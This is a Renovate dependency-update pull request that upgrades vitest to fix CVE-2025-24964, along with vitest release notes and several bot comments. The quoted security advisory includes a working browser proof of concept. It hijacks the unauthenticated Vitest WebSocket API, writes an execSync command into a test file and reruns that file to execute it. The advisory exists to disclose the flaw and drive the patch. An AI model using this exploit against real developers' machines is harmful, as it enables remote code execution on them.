fix(deps): update dependency vitest [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vitest (source)	^1.2.1 -> ^3.0.0
vitest (source)	^1.0.0 -> ^3.0.0
vitest (source)	2.1.5 -> 2.1.9
vitest (source)	2.1.4 -> 2.1.9
vitest (source)	^2.1.4 -> ^3.0.0
vitest (source)	^1.2.0 -> ^3.0.0
vitest (source)	^2.1.5 -> ^3.0.0
vitest (source)	3.0.2 -> 3.0.5
vitest (source)	^2.1.8 -> ^3.0.0
vitest (source)	^2.1.5 -> ^3.0.5
vitest (source)	2.1.8 -> 2.1.9
vitest (source)	^0.34.6 -> ^3.0.0
vitest (source)	1.1.3 -> 1.6.1
vitest (source)	1.2.1 -> 1.6.1
vitest (source)	2.1.5 -> 3.0.5

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

1. Open Vitest UI.
2. Access a malicious web site with the script below.
3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

---

Release Notes

vitest-dev/vitest (vitest)

v3.0.5

Compare Source

🚀 Features

• ui: Insert message "no tests found" in ui - by @​DevJoaoLopes in https://github.com/vitest-dev/vitest/issues/7366 (92da4)

🐞 Bug Fixes

• Validate websocket request - by @​hi-ogawa and @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7317 (191ef)
• Don't toggle cli cursor on non-TTY - by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7336 (3c805)
• vite-node: Differentiate file url with hash and query - by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7365 (926ca)

View changes on GitHub

v3.0.4

Compare Source

   🐞 Bug Fixes

• Filter projects eagerly during config resolution  -  by @​sheremet-va and @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7313 (dff44)
• Apply development|production condition on Vites 6 by @​hi-ogawa and @​sheremet-va (#​7301) (ef146)
• browser: Restrict served files from /__screenshot-error  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7340 (ed9ae)
• deps: Update all non-major dependencies  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7297 (38ea8)
• runner: Timeout long sync hook  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7289 (c60ee)
• typechecking: Support typechecking parsing with Vite 6  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7335 (bff70)
• types: Fix public types  -  by @​mrginglymus and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7328 (ce6af)

    View changes on GitHub

v3.0.3

Compare Source

   🐞 Bug Fixes

• browser:
  • Don't throw a validation error if v8 coverage is used with filtered instances  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7306 (fa463)
  • Don't fail when running --browser.headless if the browser projest is part of the workspace  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7311 (e43a8)

   🏎 Performance

• reporters: Update summary only when needed  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7291 (7f36b)

    View changes on GitHub

v3.0.2

Compare Source

   🐞 Bug Fixes

• Don't await an empty timeout after every test  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7281 (ef1aa)
• expect: Fix expect().resolves/rejects chain typings  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7273 (fa415)

    View changes on GitHub

v3.0.1

Compare Source

   🐞 Bug Fixes

• Revert "fix: re-apply default conditions if using vite 6 or later (https://github.com/vitest-dev/vitest/issues/7071)"  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7071 and https://github.com/vitest-dev/vitest/issues/7271 (755ec)
• deps: Update all non-major dependencies  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7147 (537fa)

    View changes on GitHub

v3.0.0

Compare Source

   🚨 Breaking Changes

• spy.mockReset changes  -  by @​Lordfirespeed in https://github.com/vitest-dev/vitest/issues/6426 (db7a8)
• Pass down context to test hooks  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7034 (82c2e)
• Support Vite 6  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7026 (7abe8)
• coverage: Always exclude test files  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7254 (b5268)
• deps: Update fake-timers to v14.0.0  -  by @​xxzefgh and @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7097 (c98b4)
• expect: Check more properties for error equality  -  by @​hi-ogawa and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/5876 (10023)
• runner: Support describe(..., { shuffle: boolean }) and inherit from parent suite  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6670 (aa1da)
• snapshot: Reset snapshot state for retry and repeats  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6817 (e8ce9)
• spy: SpyOn reuses mock if method is already spyed on  -  by @​sheremet-va and @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6464 (b3e43)
• vitest: Don't expose default toFake config  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6288 (e3144)

   🚀 Features

• Support inline diff options and support printBasicPrototype  -  by @​hi-ogawa, @​sheremet-va and Michał Grzegorzewski in https://github.com/vitest-dev/vitest/issues/6740 (39186)
• Allow a custom note when calling ctx.skip() dynamically  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6805 (697c3)
• Allow inline workspace configuration  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6923 (562e1)
• Provide the current project to the global setup  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6942 (a5bbc)
• Print project name as a label  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6925 (a3bef)
• Print a deprecation warning if suite or test uses object as the third argument  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7031 (407f1)
• Expose versions from vitest/node entry point and statically on Vitest  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7029 (be8d4)
• diff.printBasicPrototype: false by default  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7043 (2b5c5)
• Prepare the Vitest API to be stable  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6962 (9a1b5)
• Support Vite v6 in mocker package  -  by @​cexbrayat in https://github.com/vitest-dev/vitest/issues/7058 (96f47)
• Allow multi-browser configuration  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6975 (78b62)
• Add resolved project names to the reporter API  -  by @​userquin in https://github.com/vitest-dev/vitest/issues/7213 (91758)
• Introduce the new reporter API  -  by @​sheremet-va and @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7069 (76662)
• Add describe.for  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7253 (0ad28)
• api:
  • Add onBrowserInit event  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7255 (80ce0)
• browser:
  • Support actionTimeout as playwright provider options  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6984 (e2c29)
  • Support clipboard api userEvent.copy, cut, paste  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6769 (843a6)
  • Implement locator.nth()  -  by @​xeger and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7137 (38458)
• cli:
  • Support excluding projects with --project=!pattern  -  by @​haines in https://github.com/vitest-dev/vitest/issues/6924 (ebfe9)
  • Support specifying a line number when filtering tests  -  by @​mzhubail and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6411 (4d94b)
  • Support location filters for suites  -  by @​mzhubail in https://github.com/vitest-dev/vitest/issues/7048 (751e2)
• coverage:
  • thresholds to support maximum uncovered items  -  by @​jonahkagan in https://github.com/vitest-dev/vitest/issues/7061 (bde98)
• expect:
  • Add toHaveBeenCalledExactlyOnceWith expect matcher  -  by @​jacoberdman2147 and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6894 (ff662)
  • Add toHaveBeenCalledAfter and toHaveBeenCalledBefore utility  -  by @​Barbapapazes and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6056 (85e6f)
  • Add toSatisfy asymmetric matcher  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7022 (f691a)
  • Add toBeOneOf matcher  -  by @​zirkelc and @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6974 (3d742)
• reporter:
  • Add support for function type to classname option in the junit reporter  -  by @​jpleclerc, Jean-Philippe Leclerc and @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6839 (dc238)
• reporters:
  • summary option for verbose and default reporters  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6893 (511b7)
• runner:
  • Test context can inject values from the config's provide  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6813 (85c64)
  • Add "queued" state  -  by @​sheremet-va and @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6931 (5f8d2)
• snapshot:
  • Provide config to resolveSnapshotPath  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6800 (746d8)
• ui:
  • Allow run individual tests/suites from the UI  -  by @​userquin in https://github.com/vitest-dev/vitest/issues/6641 (d9cc8)
  • Make clicking on a test in the UI open the report section and scroll to the test failure if applicable  -  by @​jacoberdman2147 in https://github.com/vitest-dev/vitest/issues/6900 (1bf27)
  • Allow hide/show node_modules in module graph tab  -  by @​userquin in https://github.com/vitest-dev/vitest/issues/7217 (50cf6)
• vitest:
  • Include coverageMap in json report  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6606 (9c8f7)
  • Add onTestsRerun method to global setup context  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6803 (e26e0)

   🐞 Bug Fixes

• Misc fix for vite 6 ecosystem ci  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6867 (80f8b)
• Respect cacheDir when optimizer is enabled  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6910 (0b08b)
• Reset runningPromise after finally in case there is an error to avoid it getting stuck  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6951 (02194)
• Revert support for Vite 6  -  by @​sheremet-va (fbe5c)
• Support Node 21  -  by @​sheremet-va (92f7a)
• Don't use Custom internally  -  by @​sheremet-va (46fc5)
• Don't use Custom internally"  -  by @​sheremet-va (db19f)
• Don't use Custom type internally  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7032 (7957f)
• Persist cli filters as watch mode file filter  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6955 (cc703)
• Don't use dim color for succeeded tests  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7059 (8a6f5)
• Fix missing chai types  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7149 (6a09c)
• cancelCurrentRun awaits runningPromise  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7168 (1dbf5)
• Add Locator typings for nth, first and last.  -  by @​xeger in https://github.com/vitest-dev/vitest/issues/7176 (d262e)
• Batch console logs by microtask  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7183 (53d1d)
• Allow getMockImplementation to return "once" implementation  -  by @​chaptergy in https://github.com/vitest-dev/vitest/issues/7033 (39125)
• capturePrintError logger duplicate event handlers  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7197 (e89c3)
• Allow slots in vitest-browser-vue  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7120 (2319f)
• Reset root workspace project on restart  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7238 (6e518)
• Cleanup vitest/reporters entrypoint  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7241 (aec0b)
• Colors on forks pool  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7090 (8cab9)
• Export VitestRunner type from vitest/runners  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7240 (9b218)
• Return test fn result to runner  -  by @​wmertens in https://github.com/vitest-dev/vitest/issues/7239 (48645)
• Re-apply default conditions if using vite 6 or later  -  by @​thebanjomatic, thebanjomatic and @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7071 (84287)
• Prevent infinite loop on prettyDOM calls  -  by @​tsirlucas in https://github.com/vitest-dev/vitest/issues/7250 (a3a46)
• api:
  • Don't report events during vitest list  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7257 (1c2b2)
• benchmark:
  • Disable type testing while benchmarking  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7068 (4e603)
  • Rewrite reporter without log-update  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7019 (6d23f)
• browser:
  • Improve source maps when vi.mock is present  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6810 (8d179)
  • Explain TypeScript support in docs and add asymmetric matchers to types  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/6934 (ac1a7)
  • Fix matchers.d.ts  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6995 (a485b)
  • Fix user event state on preview provider  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7041 (8e944)
  • Fix provider options types  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7115 (579bd)
  • Only use locator.element on last expect.element attempt  -  by @​tsirlucas in https://github.com/vitest-dev/vitest/issues/7139 and https://github.com/vitest-dev/vitest/issues/7152 (847d3)
  • Use correct project when filtering entries in the browser mode  -  by @​sheremet-va in https://github.com/vitest-dev/vitest/issues/7167 (423d6)
  • Fix console.time with fake timers  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7207 (903f3)
  • Add instance validation to resolve coverage error  -  by @​DevJoaoLopes and @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7231 (1e791)
• coverage:
  • Exclude browser mode iframe results  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6905 (e04a1)
  • Correct coverage when isolate: false is used  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6957 (426ce)
  • Prevent crash when v8 incorrectly merges static_initializer's  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7150 (cb6db)
• deps:
  • Update all non-major dependencies  -  in https://github.com/vitest-dev/vitest/issues/7085 (8cc92)
  • Update all non-major dependencies  -  in https://github.com/vitest-dev/vitest/issues/7116 (de5ce)
  • Update dependency pathe to v2  -  in https://github.com/vitest-dev/vitest/issues/7181 (74dbe)
• diff:
  • Truncate to avoid crash on diff large objects  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7133 (2a9d6)
• junit:
  • Fix testsuites time to be sum of all testsuite items  -  by @​saitonakamura in https://github.com/vitest-dev/vitest/issues/6985 (ca37a)
• pretty-format:
  • Support react 19  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6909 (bd29b)
• reporters:
  • Write buffered stdout/stderr on process exit  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6932 (80cde)
  • Rewrite dot reporter without log-update  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6943 (be969)
  • Check --hideSkippedTests in base reporter  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/6988 (721a5)
  • Show retry and repeats counts  -  by @​AriPerkkio and @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7004 (3496a)
• runner:
  • Long synchronous tasks does not time out  -  by @​ferdodo and @​sheremet-va in https://github.com/vitest-dev/vitest/issues/2920 and https://github.com/vitest-dev/vitest/issues/6944 (2fb58)
  • Mark tests of describe.todo as 'todo'  -  by @​AriPerkkio in https://github.com/vitest-dev/vitest/issues/7171 (1d458)
• snapshot:
  • Fix "obsolete" message on snapshot update re-run  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7129 (c2beb)
  • Preserve white space of toMatchFileSnapshot  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7156 (a437b)
  • Fix obsoleteness check of toMatchSnapshot("...")  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7126 (ac9ba)
• typecheck:
  • Fix typecheck collect on Vite 6  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6972 (7b35d)
  • Use unique temp and tsbuildinfo file for each tsconfig file  -  by @​masnormen in https://github.com/vitest-dev/vitest/issues/7107 and https://github.com/vitest-dev/vitest/issues/7112 (61b30)
  • Fix error test case mapping for @ts-expect-error  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/7125 (27d34)
• types:
  • Make parameters non-nullable for Playwright options  -  by @​apple-yagi in https://github.com/vitest-dev/vitest/issues/6989 (fe2a1)
• ui:
  • Wrong module graph when generating html.meta.json.gz in browser mode  -  by @​userquin in https://github.com/vitest-dev/vitest/issues/7214 (dccdd)
  • Add errors and draft state (*) to the code editor  -  by @​userquin in https://github.com/vitest-dev/vitest/issues/7044 (faca4)
• vite-node:
  • Fix error stack on Windows  -  by @​hi-ogawa in https://github.com/vitest-dev/vitest/issues/6786 [(bf7b3)](https://redirect.github.com/vitest-dev/vitest/

---

Configuration

📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: pnpm-lock.yaml

Scope: all 150 workspace projects
 ERR_PNPM_OUTDATED_LOCKFILE  Cannot install with "frozen-lockfile" because pnpm-lock.yaml is not up to date with <ROOT>/package.json

Note that in CI environments this setting is true by default. If you still need to run install in such cases, use "pnpm install --no-frozen-lockfile"

    Failure reason:
    specifiers in the lockfile ({"@0glabs/0g-ts-sdk":"0.2.1","@coinbase/coinbase-sdk":"0.10.0","@deepgram/sdk":"^3.9.0","@injectivelabs/sdk-ts":"^1.14.33","@vitest/eslint-plugin":"1.0.1","amqplib":"0.10.5","bs58":"5.0.0","csv-parse":"5.6.0","langdetect":"^0.2.1","ollama-ai-provider":"0.16.1","optional":"0.1.4","pnpm":"9.15.0","sharp":"0.33.5","@biomejs/biome":"^1.9.4","@commitlint/cli":"18.6.1","@commitlint/config-conventional":"18.6.3","@types/jest":"^29.5.11","concurrently":"9.1.0","cross-env":"7.0.3","husky":"9.1.7","jest":"^29.7.0","lerna":"8.1.5","only-allow":"1.2.1","turbo":"2.3.3","typedoc":"0.26.11","typescript":"5.6.3","viem":"2.21.58","vite":"5.4.12","vitest":"2.1.5"}) don't match specs in package.json ({"@biomejs/biome":"^1.9.4","@commitlint/cli":"18.6.1","@commitlint/config-conventional":"18.6.3","@types/jest":"^29.5.11","concurrently":"9.1.0","cross-env":"7.0.3","husky":"9.1.7","jest":"^29.7.0","lerna":"8.1.5","only-allow":"1.2.1","turbo":"2.3.3","typedoc":"0.26.11","typescript":"5.6.3","viem":"2.21.58","vite":"5.4.12","vitest":"3.0.5","@0glabs/0g-ts-sdk":"0.2.1","@coinbase/coinbase-sdk":"0.10.0","@deepgram/sdk":"^3.9.0","@injectivelabs/sdk-ts":"^1.14.33","@vitest/eslint-plugin":"1.0.1","amqplib":"0.10.5","bs58":"5.0.0","csv-parse":"5.6.0","langdetect":"^0.2.1","ollama-ai-provider":"0.16.1","optional":"0.1.4","pnpm":"9.15.0","sharp":"0.33.5"})

[coderabbitai]

Important

Review skipped

Auto reviews are disabled on this repository.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

---

Thank you for using CodeRabbit. We offer it for free to the OSS community and would appreciate your support in helping us grow. If you find it useful, would you consider giving us a shout-out on your favorite social media?

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

• Review comments: Directly reply to a review comment made by CodeRabbit. Example:
  • I pushed a fix in commit <commit_id>, please review it.
  • Generate unit testing code for this file.
  • Open a follow-up GitHub issue for this discussion.
• Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
  • @coderabbitai generate unit testing code for this file.
  • @coderabbitai modularize this function.
• PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
  • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
  • @coderabbitai read src/utils.ts and generate unit testing code.
  • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
  • @coderabbitai help me debug CodeRabbit configuration file.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

• @coderabbitai pause to pause the reviews on a PR.
• @coderabbitai resume to resume the paused reviews.
• @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
• @coderabbitai full review to do a full review from scratch and review all the files again.
• @coderabbitai summary to regenerate the summary of the PR.
• @coderabbitai generate docstrings to generate docstrings for this PR. (Beta)
• @coderabbitai resolve resolve all the CodeRabbit review comments.
• @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
• @coderabbitai help to get help.

Other keywords and placeholders

• Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
• Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
• Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (.coderabbit.yaml)

• You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
• Please see the configuration documentation for more information.
• If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

• Visit our Documentation for detailed information on how to use CodeRabbit.
• Join our Discord Community to get help, request features, and share feedback.
• Follow us on X/Twitter for updates and announcements.

[graphite-app]

How to use the Graphite Merge Queue

Add either label to this PR to merge it via the merge queue:

• merge-queue - adds this PR to the back of the merge queue
• merge-queue-hotfix - for urgent hot fixes, skip the queue and merge this PR next

You must have a Graphite account in order to use the merge queue. Sign up using this link.

An organization admin has enabled the Graphite Merge Queue in this repository.

Please do not merge from GitHub as this will restart CI on PRs being processed by the merge queue.

[graphite-app]

The @alloralabs/allora-sdk dependency is listed twice with conflicting versions (0.0.4 and ^0.1.0). To avoid potential dependency resolution issues, please remove the 0.0.4 entry and keep only the ^0.1.0 version.

Spotted by Graphite Reviewer

Is this helpful? React 👍 or 👎 to let us know.

[renovate]

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.